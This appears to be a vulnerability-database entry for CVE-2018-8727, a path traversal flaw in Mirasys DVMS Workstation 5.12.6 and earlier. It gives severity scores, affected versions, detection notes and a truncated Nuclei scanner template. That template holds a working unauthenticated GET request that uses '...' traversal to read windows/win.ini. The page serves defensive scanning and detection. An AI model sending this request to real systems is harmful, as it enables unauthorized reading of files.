CVE-2018-8727
published 2018-06-19CVE-2018-8727: Path Traversal in Gateway in Mirasys DVMS Workstation 5.12.6 and earlier allows an attacker to traverse the file system to access files or directories via the…
PriorityP262high7.5CVSS 3.0
AVNACLPRNUINSUCHINAN
EXPLOIT
EPSS
7.80%
93.9th percentile
Path Traversal in Gateway in Mirasys DVMS Workstation 5.12.6 and earlier allows an attacker to traverse the file system to access files or directories via the Web Client webserver.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mirasys | dvms_workstation | <= 5.12.6 | — |
Detection & IOCsextracted from sources · hover to see the quote
- →HTTP GET request to the path traversal payload targeting win.ini; match response body for all three strings: 'bit app support', 'fonts', and 'extensions' (AND condition) to confirm successful LFI exploitation. ↗
- →The traversal uses '...' (three dots) as the path separator bypass instead of the standard '../' sequence — detection rules should account for this non-standard traversal pattern in HTTP request URIs. ↗
- →Unauthenticated (PR:N, UI:N) HTTP GET request via the Mirasys DVMS Web Client webserver; no authentication required to exploit the path traversal. ↗
- ·Affected versions are Mirasys DVMS Workstation 5.12.6 and earlier; upgrade to 5.12.7 or later to mitigate. ↗
CVSS provenance
nvdv3.07.5HIGHCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Nuclei
Mirasys DVMS Workstation <=5.12.6 - Local File Inclusion
nuclei·CVSS 7.5
CVE-2018-8727 [HIGH] Mirasys DVMS Workstation <=5.12.6 - Local File Inclusion
Mirasys DVMS Workstation =5.12.7) to mitigate the LFI vulnerability.
reference:
- https://packetstormsecurity.com/files/148266/Mirasys-DVMS-Workstation-5.12.6-Path-Traversal.html
- https://www.onvio.nl/nieuws/cve-mirasys-vulnerability
- https://nvd.nist.gov/vuln/detail/CVE-2018-8727
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2018-8727
cwe-id: CWE-22
epss-score: 0.52255
epss-percentile: 0.97929
cpe: cpe:2.3:a:mirasys:dvms_workstation:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: mirasys
product: dvms_workstation
tags: cve,cve2018,mirasys,lfi,packetstorm,vuln
http:
- method: GET
path:
- "{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini"
matchers:
- type: word
par
No writeups or analysis indexed.
2018-06-19
Published